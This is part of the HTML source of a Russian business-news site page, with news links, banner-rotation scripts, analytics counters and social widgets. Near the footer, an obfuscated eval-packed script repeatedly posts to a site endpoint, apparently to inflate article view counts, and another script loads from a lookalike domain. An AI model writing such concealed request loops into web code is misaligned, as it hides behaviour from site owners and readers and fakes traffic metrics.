					<a href="/uznai/news/birjevoj_rnok_zerna_otkrvaet_dlia_tambovskih_agrariev_nove_vozmojnosti/"><img class="w60" src="/img/uznai/2013/8378_m.jpg" alt="Биржевой рынок зерна открывает для тамбовских аграриев новые возможности"></a>					<a class="news_list__item__title" href="/uznai/news/birjevoj_rnok_zerna_otkrvaet_dlia_tambovskih_agrariev_nove_vozmojnosti/"><span>Биржевой рынок зерна открывает для тамбовских аграриев новые возможности</span></a>
				</div>
<style>
	.trendNC {background-color: #003663; padding: 9px; margin-bottom: 22px; }
	.trendNC a {color:white; font-family: 'russiabold', tahoma, sans serif; font-size: 16px; font-weight: bold; text-decoration: none; }
	.trendNC .im img { width:192px; }
</style>
<div class="trendNC">
	<div class="im"><a href="/articles/article/produkty_podorojaut_izza_benzina_v_kitae_obyavili_o_pobede_korrupcii_i_drug/"><img src="/img/articles/284482_m.jpg" alt="Продукты подорожают из-за бензина, в Китае объявили о победе коррупции и другие новости вторника"></a></div>
	<div class="a"><a href="/articles/article/produkty_podorojaut_izza_benzina_v_kitae_obyavili_o_pobede_korrupcii_i_drug/" class="news_list__item__title">Продукты подорожают из-за бензина, в Китае объявили о победе коррупции и другие новости вторника</a></div>
</div>

<script>
$$(function(){
	$$(".trendNC .im, .trendNC .a")
		.mouseover(function(){$$(this).parent().css({"text-decoration":"underline"})})
		.mouseout(function(){$$(this).parent().css({"text-decoration":"none"})})
})
</script>
				<div class="news_list__item">
					<span class="news_list__item__date">07:24</span>
					<a href="/uznai/news/v_primore_sudostroitelnaia_verf_zvezda_perejdet_na_otechestvennuu_stal__/"><img class="w60" src="/img/uznai/2013/8377_m.jpg" alt="В Приморье судостроительная верфь «Звезда» перейдет на отечественную сталь  "></a>					<a class="news_list__item__title" href="/uznai/news/v_primore_sudostroitelnaia_verf_zvezda_perejdet_na_otechestvennuu_stal__/"><span>В Приморье судостроительная верфь «Звезда» перейдет на отечественную сталь  </span></a>
				</div>
				<div class="news_list__item">
					<span class="news_list__item__date">01 АПР, 13:47</span>
					<a href="/uznai/news/v_aprele_v_omske_otkroetsia_dachnj_sezon/"><img class="w60" src="/img/uznai/2013/8363_m.jpg" alt="В апреле в Омске откроется «дачный сезон»"></a>					<a class="news_list__item__title" href="/uznai/news/v_aprele_v_omske_otkroetsia_dachnj_sezon/"><span>В апреле в Омске откроется «дачный сезон»</span></a>
				</div>
				<div class="news_list__item">
					<span class="news_list__item__date">31 МАР, 09:36</span>
					<a href="/uznai/news/top10_dostijenij_marta_chto_vperve_v_rossii_i_v_mire_sdelali_v_rossijskih_regionah/"><img class="w60" src="/img/uznai/2013/8356_m.jpg" alt="ТОП-10 достижений марта: что впервые в России и в мире сделали в российских регионах?"></a>					<a class="news_list__item__title" href="/uznai/news/top10_dostijenij_marta_chto_vperve_v_rossii_i_v_mire_sdelali_v_rossijskih_regionah/"><span>ТОП-10 достижений марта: что впервые в России и в мире сделали в российских регионах?</span></a>
				</div>
				<div class="news_list__item">
					<span class="news_list__item__date">29 МАР, 20:39</span>
					<a href="/uznai/news/top10_dostijenij_nedeli_v_kakih_rossijskih_regionah_proizoshli_sobtiia_mirovogo_znacheniia/"><img class="w60" src="/img/uznai/2013/8355_m.jpg" alt="ТОП-10 достижений недели: в каких российских регионах произошли события мирового значения?"></a>					<a class="news_list__item__title" href="/uznai/news/top10_dostijenij_nedeli_v_kakih_rossijskih_regionah_proizoshli_sobtiia_mirovogo_znacheniia/"><span>ТОП-10 достижений недели: в каких российских регионах произошли события мирового значения?</span></a>
				</div>
				<div class="news_list__item">
					<span class="news_list__item__date">29 МАР, 18:28</span>
					<a href="/uznai/news/v_orenburgskoj_oblasti_vveli_v_ekspluataciu_chkalovskuu_ses_moschnostu_30_mvt/"><img class="w60" src="/img/uznai/2013/8354_m.jpg" alt="В Оренбургской области ввели в эксплуатацию Чкаловскую СЭС мощностью 30 МВт"></a>					<a class="news_list__item__title" href="/uznai/news/v_orenburgskoj_oblasti_vveli_v_ekspluataciu_chkalovskuu_ses_moschnostu_30_mvt/"><span>В Оренбургской области ввели в эксплуатацию Чкаловскую СЭС мощностью 30 МВт</span></a>
				</div>
<style>
	.trendNC {background-color: #003663; padding: 9px; margin-bottom: 22px; }
	.trendNC a {color:white; font-family: 'russiabold', tahoma, sans serif; font-size: 16px; font-weight: bold; text-decoration: none; }
	.trendNC .im img { width:192px; }
</style>
<div class="trendNC">
	<div class="im"><a href="/articles/article/rossiyane_tratyat_tret_dohodov_na_pitanie_goskompanii_zastavyat_polzovatsya/"><img src="/img/articles/284477_m.jpg" alt="Россияне тратят треть доходов на питание, госкомпании заставят пользоваться отечественным софтом и другие новости понедельника"></a></div>
	<div class="a"><a href="/articles/article/rossiyane_tratyat_tret_dohodov_na_pitanie_goskompanii_zastavyat_polzovatsya/" class="news_list__item__title">Россияне тратят треть доходов на питание, госкомпании заставят пользоваться отечественным софтом и другие новости понедельника</a></div>
</div>

<script>
$$(function(){
	$$(".trendNC .im, .trendNC .a")
		.mouseover(function(){$$(this).parent().css({"text-decoration":"underline"})})
		.mouseout(function(){$$(this).parent().css({"text-decoration":"none"})})
})
</script>
				<div class="news_list__item">
					<span class="news_list__item__date">27 МАР, 11:38</span>
					<a href="/uznai/news/gradostroitelne_aspekt_nacionalnogo_proekta_jile_i_gorodskaia_sreda/"><img class="w60" src="/img/uznai/2013/8334_m.jpg" alt="Градостроительные аспекты национального проекта «Жильё и городская среда»"></a>					<a class="news_list__item__title" href="/uznai/news/gradostroitelne_aspekt_nacionalnogo_proekta_jile_i_gorodskaia_sreda/"><span>Градостроительные аспекты национального проекта «Жильё и городская среда»</span></a>
				</div>
			</div>

		</div>	</div></section><aside class="right-lenta three-coll__coll">
	<div class="banner_body">
<!-- <div id="b_106"></div> -->
























<script>
	function frfb3_rotator (){
		var s = ""
		if(window.frfb3_NO==1){
			//s = '<a id="banner_id48" href="http://kapital-rus.ru/newscom/news/sozdanie_uslovij_dlia_razvitiia_sadovodstva_obsudili_v_gosdume/"><img src="http://kapital-rus.ru/img/2014/banners/sadovodstvo2014.jpg" alt="Создание условий для развития садоводства обсудили в Госдуме" title="Создание условий для развития садоводства обсудили в Госдуме" border="0" /></a>'
			s = '<a id="banner_id58" href="http://www.kapital-rus.ru/articles/article/investicionnye_forumy_v_rossii_i_ih_informacionnoe_soprovozhdenie/"><img src="http://kapital-rus.ru/img/2015/banners/information_investForums2015ks_v2.jpg" alt="Инвестиционные форумы в России и их информационное сопровождение" title="Инвестиционные форумы в России и их информационное сопровождение" style="border:none;" /></a>'
			window.frfb3_NO=2
		}else{
			s = '<a id="banner_id58" href="http://www.kapital-rus.ru/articles/article/investicionnye_forumy_v_rossii_i_ih_informacionnoe_soprovozhdenie/"><img src="http://kapital-rus.ru/img/2015/banners/information_investForums2015ks_v2.jpg" alt="Инвестиционные форумы в России и их информационное сопровождение" title="Инвестиционные форумы в России и их информационное сопровождение" style="border:none;" /></a>'
			window.frfb3_NO=1
		}
		$$("#frfb3").html(s)
		$$("#banner_id58").attr("banner_id", 58);
		setTimeout("frfb3_rotator()", 4000)
	}

	$$(function(){
		//window.frfb3_NO=1; frfb3_rotator();
		$$("#banner_id58").attr("banner_id", 58);
	})
</script>














<script>
	function incrementBannerShow(id){
		$$.post('/lga/silicium/ajax/respondents/u1.php', {mode:'incrementBannerShow', id:id}, function(a){})
	}
	function incrementBannerClick(id){
		$$.post('/lga/silicium/ajax/respondents/u1.php', {mode:'incrementBannerClick', id:id}, function(a){})
	}

	//Функция ищет DOM-элементы со свойством "banner_id" и присваивает им события onclick - для подсчета кликов по баннеру
	function set_banner_traced (){
		$$("[banner_id]").each(function(){
			var a = $$(this)
			var banner_traced = a.attr('banner_traced')
			if(banner_traced==undefined){
				a.click(function(){
					incrementBannerClick ($$(this).attr('banner_id'))
				})
				a.attr('banner_traced', 1)
			}
		})
		setTimeout(set_banner_traced, 300)
	}


	$$(document).ready(function(){
		set_banner_traced()
	})
</script>
	</div>
		<div class="banner_body">
		<div id="electro-2019"></div>
<div id="fiabci2019"></div>
<div id="franchising2019"></div>
<div id="top10_banner"></div>

<div style="margin-bottom:12px;"><a id="banner_id58" class="bnrcl" href="http://www.kapital-rus.ru/articles/article/investicionnye_forumy_v_rossii_i_ih_informacionnoe_soprovozhdenie/"><img src="/img/2015/banners/information_investForums2015ks_v2.jpg" alt="Инвестиционные форумы в России и их информационное сопровождение" title="Инвестиционные форумы в России и их информационное сопровождение" style="border:none;" /></a></div>


<div id="psichosomatic"></div>
<div id="monogoroda" style="margin-bottom:6px"></div>
<div id="institutions_development" style="margin-bottom:6px"><a href="/articles/C320/" id="banner_id95" class="bnrcl"><img src="/img/2017/banners/institutions_development.png" alt="Мониторинг современных региональных институтов развития"></a></div>
<div id="fromrightfirst_tpp" style="margin-bottom:6px"></div>
<div id="fromrightfirst_before0" style="margin-bottom:6px"><a id="banner_id28" class="bnrcl" href="/uznai/" target="_blank"><img src="/img/2013/banners/uznai250x68.png" alt="Узнай, Страна!" title="Узнай, Страна!" style="border:none;" /></a></div>
<div id="terralife_banner" style="margin:6px 0; text-align:center"></div>
<div id="izmir2017_250x"></div>
<div id="psyrazvitie" style="margin-bottom:6px"></div>
<div id="fromrightfirst_before00" style="margin-bottom:6px"></div>
<div id="gq_travel"></div>
<!-- <div id="integritas"></div> -->


<script>
	$$(function() {
		// $$("#integritas").html('<a id="banner_id56" class="bnrcl" href="http://inclinica.ru/" target="_blank"><img src="http://kapital-rus.ru/img/2015/banners/integritas250x250.jpg" alt="Клиника Интегритас" title="Клиника Интегритас" border="0" /></a>')

		$$("#terralife_banner").html('<a id="banner_id24" class="bnrcl" href="http://terralife.ru/" target="_blank"><img src="http://kapital-rus.ru/img/2017/banners/terralife.png" style="border:none;" /></a>');

		$$("#psyrazvitie").html('<a id="banner_id128" class="bnrcl" href="https://www.youtube.com/channel/UCJeMfxIIgRclE2wQddN4aIw/videos" target="_blank"><img src="http://kapital-rus.ru/img/2019/banners/psy_v3.jpg" style="border:none;" /></a>');

		$$("#izmir2017_250x").html('<a id="banner_id107" class="bnrcl" href="http://kapital-rus.ru/izmir/"><img src="http://kapital-rus.ru/img/2017/banners/izmir2017_250x.png" style="border:none;" /></a>').css({"margin":"10px 0"});

		$$("#psichosomatic").html('<a id="banner_id122" class="bnrcl" href="/psichosomatic/"><img src="/inc2/pages/other/psichosomatic/img/psichosomatic3.jpg" style="border:none;" /></a>').css({"margin":"10px 0"});

		$$("#electro-2019").html('<a id="banner_id130" class="bnrcl" href="http://www.elektro-expo.ru" target="_blank"><img src="/img/2019/banners/electro-2019.png" style="border:none;" /></a>').css({"margin":"10px 0"});


		$$("#fiabci2019").html('<a id="banner_id132" class="bnrcl" href="http://2019blockchain.ru/ru/" target="_blank"><img src="/img/2019/banners/fiabci_250x158.png" style="border:none;" /></a>').css({"margin":"10px 0"});

		$$("#franchising2019").html('<a id="banner_id134" class="bnrcl" href="https://www.eventbank.ru/event/99/" target="_blank"><img src="/img/2019/banners/franchising2019.png" /></a>').css({"margin":"10px 0"});

		$$("#top10_banner").html('<a id="banner_id129" class="bnrcl" href="https://www.youtube.com/playlist?list=PLgHtCsdlYDhXbt84HRvQxvUutKGZvB9Do" target="_blank"><img src="/img/2019/banners/top10_2.jpg" /></a>').css({"margin":"10px 0"});

		$$("#gq_travel").html('<a id="banner_id123" class="bnrcl" target="_blank" href="http://gq-travel.ru/"><img src="/img/2018/banners/gq-travel_250x250.jpg" style="border:none;" /></a>').css({"margin":"10px 0"});


		$$("#econ_of_future_banner250x250").html('<a id="banner_id109" class="bnrcl" href="https://www.youtube.com/playlist?list=PLgHtCsdlYDhXXDowP39xUrbGGzJpbDiZi" target="_blank"><img src="http://kapital-rus.ru/img/2017/banners/econ_of_future_banner250x250.png" style="border:none;" /></a>').css({"margin":"10px 0"});


		placeHTMLin__fromrightfirst_before00()
		// $$("#checkout").html('<a id="banner_id49" href="http://www.checkout.ru/" target="_blank"><img src="http://kapital-rus.ru/img/2014/banners/checkout4_240x400.gif" alt="CheckOut" title="CheckOut" style="border:none;" /></a>')
		//$$("#banner_kazansummit2014").html('<a id="banner_id35" href="http://www.kazansummit.ru/" target="0"><img src="http://kapital-rus.ru/img/2014/banners/BannerKS_250x180.gif" style="border:none;" /></a>')



		$$("#banner_id134").attr("banner_id", 134);
		$$("#banner_id132").attr("banner_id", 132);
		$$("#banner_id130").attr("banner_id", 130);
		$$("#banner_id129").attr("banner_id", 129);
		$$("#banner_id128").attr("banner_id", 128);
		$$("#banner_id107").attr("banner_id", 107);
		$$("#banner_id122").attr("banner_id", 122);
		$$("#banner_id123").attr("banner_id", 123);
		$$("#banner_id95").attr("banner_id", 95);
		// $$("#banner_id56").attr("banner_id", 56);
		$$("#banner_id28").attr("banner_id", 28);
		$$("#banner_id24").attr("banner_id", 24);
		// $$("#banner_id49").attr("banner_id", 49);
		$$("#banner_id35").attr("banner_id", 35);
		$$("#banner_id29").attr("banner_id", 29);
		$$("#banner_id72").attr("banner_id", 72);
		$$("#banner_id109").attr("banner_id", 109);
		$$("#banner_id120").attr("banner_id", 120);
	})

	function placeHTMLin__fromrightfirst_before00(){
		//{* var a = Math.random(); if(a>0.5) { } else { } *}
		$$("#fromrightfirst_before00").html('<a id="banner_id29" class="bnrcl" href="http://www.deloros.ru/" target="_blank"><img src="http://kapital-rus.ru/img/2013/banners/deloros250x68.png" 	alt="Деловая Россия - Общероссийская общественная организация" title="Деловая Россия - Общероссийская общественная организация" style="border:none;" /></a>')
		$$("#monogoroda").html('<a id="banner_id120" class="bnrcl" href="/arhyz/"><img src="/img/2018/banners/monogoroda_2018_250x.png" title="Моногорода: Импульс для расширения «МЕСТНОЙ ВСЕЛЕННОЙ», культурная мозаика" style="border:none;" /></a>')
		$$("#fromrightfirst_tpp").html('<a id="banner_id72" class="bnrcl" href="http://tpprf.ru/ru/" target="_blank"><img src="/img/2015/banners/tpp_250x250_2015.png" title="Торгово-промышленная палата Российской Федерации" style="border:none;" /></a>')
	}
</script>

	</div>







</aside>	</div>
	<div class="our_partners">
		<div class="opLabel">
			<h4>Наши<br/> партнеры</h4>
		</div>
		<div>
			<img src="/img2/delros.png" alt="«Деловая Россия» — союз предпринимателей нового поколения российского бизнеса" title="«Деловая Россия» — союз предпринимателей нового поколения российского бизнеса" />
		</div>
		<div>
			<img src="/img2/terra-life.png" alt="«Терралайф» - рекламное агентство полного цикла" title="«Терралайф» - рекламное агентство полного цикла" />
		</div>
		<div>
			<img src="/img2/dawai.png" alt="Dawai - Австрия на русском: новости, туризм, недвижимость, объявления, афиша" title="Dawai - Австрия на русском: новости, туризм, недвижимость, объявления, афиша" />
		</div>
		<div>
			<img src="/img2/iq-buzz.png" alt="IQ'BUZZ - профессиональный инструмент мониторинга социальных медиа в СМИ" title="IQ'BUZZ - профессиональный инструмент мониторинга социальных медиа в СМИ" />
		</div>
	</div>
		<script>window.RESOURCE_O1B2L3 = 'kapitalrus.ru';</script>
	<script src="//kapitalrus.ru/5q/zknT.js" ></script>
	
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 1(){2.5(\'/7/3/4.6\',{b:"8"},0(a){9(1,c)})}2(0(){1()})',13,13,'function|IncRandomVisitOnLast4Articles|jQuery|resps|r1|post|php|inc2|truk|setTimeout||mode|124000'.split('|'),0,{}))
</script>
	<div class="partners_if"></div>
	<footer>
		<div class="footer_content">
			<a href="/">
				<img class="footer_logo" src="/img2/bottom-logo.png" alt="Капитал Страны" />
			</a>
			<div class="footer_nav">
				<div class="footer_nav_items">
					<div class="footer_nav_items__blue">
						<a href="/articles/C305/">События</a>
					</div>
					<div class="footer_nav_items__links">
						<a href="/news/">Новости дня</a><br/>
						<a href="/articles/C11/">События и факты</a><br/>
						<a href="/articles/C19/">Новые возможности</a><br/>
						<a href="/conf/new/">Конференции</a><br/>
						<a href="/articles/C291/">Культура</a><br/>
						<a href="/articles/C312/"><b>Видеолента</b></a>
					</div>
				</div>
				<div class="footer_nav_items">
					<div class="footer_nav_items__blue">
						<a href="/articles/C10/">Общество</a>
					</div>
					<div class="footer_nav_items__links">
						<a href="/articles/C21/">Редакционные статьи</a><br/>
						<a href="/articles/C12/">Наши книги</a><br/>
						<a href="/articles/C105/">Рецензии</a><br/>
						<a href="/articles/C301/">Бизнес и психология</a><br/>
						<a href="/articles/C306/">Интервью и комментарии</a>
					</div>
				</div>
				<div class="footer_nav_items">
					<div class="footer_nav_items__blue">
						<a href="/articles/C17/">Аналитика</a>
					</div>
					<div class="footer_nav_items__links">
						<a href="/articles/C22/">Экономика</a><br/>
						<a href="/articles/C20/">Политика</a><br/>
						<a href="/articles/C18/">Наука и технологии</a><br/>
						<a href="/articles/C121/">Исследования</a><br/>
											</div>
				</div>
				<div class="footer_nav_items">
					<div class="footer_nav_items__blue">
						<a href="/projects/">Проекты</a>
					</div>
					<div class="footer_nav_items__links">
						<a href="/lite/">Тренды</a><br/>
						<a href="/uznai/">Узнай, страна!</a><br/>
						<a href="/newscom/">Новости компаний</a><br/>
						<a href="/ratings/">Рейтинги</a><br/>
																	</div>
				</div>
				<div class="footer_nav_items">
					<div class="footer_nav_items__blue">
						<a href="/about/">О нас</a>
					</div>
					<div class="footer_nav_items__links">
						<a href="/articles/article/o_nas/">О проекте</a><br/>
						<a href="/contacts/">Наши координаты</a><br/>
						<a href="/members">Наши авторы</a><br/>
						<a href="/articles/article/nashi_partnery/">Наши партнеры</a><br/>
						<a href="/articles/article/reklama_na_sajte/">Реклама на сайте</a><br/>
					</div>
				</div>
				<div class="clear"></div>
			</div>
			<div class="searching">
				<input type="text" placeholder="Поиск по сайту">
				<img src="/images/icons/search_icon.png">
			</div>
		</div><!-- .footer_content -->
		<div class="footer_info_and_counters">
			<div class="footer_info_and_counters__txt">«Капитал страны», свидетельство о регистрации СМИ Эл №ФС 77-31120, ISSN: 1999-4958</div>
			<div class="footer_info_and_counters__counters">


<!-- Yandex.Metrika informer --> <a href="https://metrika.yandex.ru/stat/?id=16639138&amp;from=informer" target="_blank" rel="nofollow"><img src="https://informer.yandex.ru/informer/16639138/3_1_FFFFFFFF_EFEFEFFF_0_pageviews" style="width:88px; height:31px; border:0;" alt="Яндекс.Метрика" title="Яндекс.Метрика: данные за сегодня (просмотры, визиты и уникальные посетители)" class="ym-advanced-informer" data-cid="16639138" data-lang="ru" /></a> <!-- /Yandex.Metrika informer --> <!-- Yandex.Metrika counter --> <script type="text/javascript"> (function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter16639138 = new Ya.Metrika2({ id:16639138, clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true, ut:"noindex" }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/tag.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks2"); </script> <noscript><div><img src="https://mc.yandex.ru/watch/16639138?ut=noindex" style="position:absolute; left:-9999px;" alt="" /></div></noscript> <!-- /Yandex.Metrika counter -->


<!-- Rating@Mail.ru counter -->
<script type="text/javascript">
var _tmr = _tmr || [];
_tmr.push( { id: "1218016", type: "pageView", start: (new Date()).getTime() } );
(function (d, w) {
   var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true;
   ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
   var f = function () { var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s); } ;
   if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
} )(document, window);
</script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=1218016;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->
<!-- Rating@Mail.ru logo -->
<!-- //Rating@Mail.ru logo -->





<a href="http://yandex.ru/cy?base=0&amp;host=kapital-rus.ru"><img src="http://www.yandex.ru/cycounter?kapital-rus.ru" width="88" height="31" alt="Яндекс цитирования" style="border:none" /></a>


<a id="asubscribe" target="_top" rel="nofollow" href=""><img alt="Рассылка 'Инвестируй и зарабатывай с нами. Издание &quot;Капитал Страны&quot;'" src="http://subscribe.ru/stat/economics.news.investwithus/count.png" width="88" height="31" style="padding:0px;margin:0px; border:none"></a>
<script>$$(function(){ $$("#asubscribe").attr("href",'http://subscribe.ru/catalog/economics.news.investwithus')})</script>


<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t44.1;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet-->

</div>
		</div>
	</footer>
</div>
<div class="social_panel">
	<div class="social_panel_inner">
		<div class="panel_cells logo_cont">
			<a href="/"><img src="/img2/bottom-logo.png" alt="Капитал страны" style="width:50px; height:50px; border:none;"></a>
		</div>
		<div class="panel_cells soc_cont">

			<script type="text/javascript">(function() {
			  if (window.pluso)if (typeof window.pluso.start == "function") return;
			  if (window.ifpluso==undefined) { window.ifpluso = 1;
			    var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
			    s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
			    s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://share.pluso.ru/pluso-like.js';
			    var h=d[g]('body')[0];
			    h.appendChild(s);
			  }})();</script>
			<div class="pluso" data-background="transparent" data-options="big,square,line,horizontal,counter,theme=04" data-services="facebook,vkontakte,twitter,google,odnoklassniki,linkedin,livejournal"></div>


<span id="vk_subscribe_wrapper" style="float:right"> <img src="/img/vk-ico20x20.png" alt="ВКонтакте" style="float: left; padding-top: 1px; padding-right: 2px;">
<script type="text/javascript" src="//vk.com/js/api/openapi.js?121"></script>

<!-- VK Widget -->
<span id="vk_subscribe"></span><script type="text/javascript">VK.Widgets.Subscribe("vk_subscribe", {soft: 1}, 153126283);</script></span>

<span style="float:right; padding-right: 14px; padding-top: 1px;">
<span id="fb-root"></span>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/ru_RU/sdk.js#xfbml=1&version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<span class="fb-follow" data-href="https://www.facebook.com/KAPITALRUS/" data-layout="button" data-show-faces="true"></span>
</span>
			<span class="ctrlenter">Нашли <b style="color: red;">ошибку</b> на сайте? Выделите ее и нажмите Ctrl+Enter</span>
		</div>
	</div>
</div>




<script>
var articleElement = jQuery("article")//элемент "Новости дня"
var elTop = 0;
if(articleElement.length>0) elTop = articleElement.offset().top + 50;//определяем смещение один раз (при загрузке страницы)
var social_panel = jQuery(".social_panel");
var winWidth = jQuery(window).width();
var winWidthHide = 750;


jQuery(function(){
	social_panel.show();
	scrollToArticle(articleElement);
	resize__social_panel_inner();
	resize__social_panel_inner_every_sec();
})


function resize__social_panel_inner(){ jQuery(".social_panel_inner").width(jQuery(".three-coll").width()); }
function resize__social_panel_inner_every_sec () { resize__social_panel_inner(); jQuery(".pluso").css({"float":"none"}); setTimeout(resize__social_panel_inner_every_sec, 500); }



function paddingControl_w(){
	var winWith = $$(window).width()
	if(winWith<1260 && winWith>480){
		$$(".main-lenta__content").css({"padding-left":"36px"})
	} else {
		$$(".main-lenta__content").css({"padding-left":"0px"})
	}
	if(winWith<980){
		$$("#vk_subscribe_wrapper").hide()
	} else $$("#vk_subscribe_wrapper").show()
}


//функция прячет нижнюю кнопку https://yadi.sk/i/J7ZtrotYq5ytj
function hideSumoMeBtn(){
	var e = $$(".sumome-share-client-animated[title='SumoMe']")
	if(e.length==0) {//если панель еще не загрузилась
		setTimeout(hideSumoMeBtn, 100);
	} else {//если загрузилась - прячем кнопку
		e.hide();
	}
} hideSumoMeBtn()


function social_panelSHOW () {
	social_panel.css({"opacity":"1", "top":"0"});
	$$(".main-lenta__content").css({"padding-left":"0px"})
	$$(".sumome-share-client-wrapper").hide()
	$$(".newsbody .share_block").show()
}


function social_panelHIDE () {
	social_panel.css({"opacity":"0", "top":"-56px"});
	paddingControl_w()
	$$(".sumome-share-client-wrapper").show()
	$$(".newsbody .share_block").hide()
}


jQuery(window).resize(function(event) {
	winWidth = jQuery(window).width();
	resize__social_panel_inner();
	scrollToArticle(articleElement);
	paddingControl_w();
});


function scrollToArticle(articleElement){
	var scrollTop = jQuery(window).scrollTop(); // текущая вертикальная позиция скролла
	if (scrollTop > elTop) {// если скролл больше чем позиция элемента (оба значения в пикселях - отступ от верха броузера)
		if(winWidth>=winWidthHide) {social_panelSHOW(); } else {social_panelHIDE(); }
	} else {
		social_panelHIDE();
	}
}
jQuery(window).scroll(function() {
	scrollToArticle(articleElement);
});

function mis_get_sel_text(){
	if (window.getSelection) {
		txt = window.getSelection();
		selected_text = txt.toString();
		full_text = '';
		if(txt.anchorNode) full_text = txt.anchorNode.textContent;
		selection_start = txt.anchorOffset;
		selection_end = txt.focusOffset;
	}
	else if (document.getSelection) {
		txt = document.getSelection();
		selected_text = txt.toString();
		full_text = txt.anchorNode.textContent;
		selection_start = txt.anchorOffset;
		selection_end = txt.focusOffset;
	}
	else if (document.selection) {
		txt = document.selection.createRange();
		selected_text = txt.text;
		full_text = txt.parentElement().innerText;

		var stored_range = txt.duplicate();
		stored_range.moveToElementText(txt.parentElement());
		stored_range.setEndPoint('EndToEnd', txt);
		selection_start = stored_range.text.length - txt.text.length;
		selection_end = selection_start + selected_text.length;
	}
	else {
		return;
	}
	var txt = {
		selected_text: selected_text,
		full_text: full_text,
		selection_start: selection_start,
		selection_end: selection_end
	};
	return txt;
}


function sendCtrlEnterError (strWithError){
	var url = document.location.href;
	jQuery.post('/inc2/resps/r1.php', {mode:'sendCtrlEnterError', strWithError:strWithError, url:url}, function(a){
		if(a=="ok"){
			// alert('Благодарим за подсказку!');
			jQuery('#ctrl_enter_checkgrammar').dialog('open');
		} else {
			console.log("Ошибка отправки выделенного текста с ошибкой.");
		}//else
	})//post

}//func


jQuery(function(){
	jQuery(window).keypress(function(e){
		if (!e) e= window.event;
		if((e.ctrlKey) && ((e.keyCode==10)||(e.keyCode==13))) {
			var sel = mis_get_sel_text();
			if (sel.selected_text.length <= 300) {
				sendCtrlEnterError (sel.selected_text);
			} else {
				alert('Для отправки ошибки выделите текст не более 300 знаков');
			}//else
		}//if
		return true;
	})//keypress

	var s = '\
<div id="ctrl_enter_checkgrammar" style="display:none">\
	<div><b>Благодарим за помощь!</b></div>\
</div>';
	jQuery('body').append(s)

	jQuery('#ctrl_enter_checkgrammar').dialog({
		autoOpen: false,
		title: 'Ошибка отправлена',
		buttons: [
			{
				text: "OK",
				click: function() {
					jQuery( this ).dialog( "close" );
				}
			}
		]
	});//dialog
})//DOM Load
</script>


	<script src="/lga/silicium/js/jquery/jquery-ui-1.8.6.custom.min.js" type="text/javascript"></script>

</body>
</html>
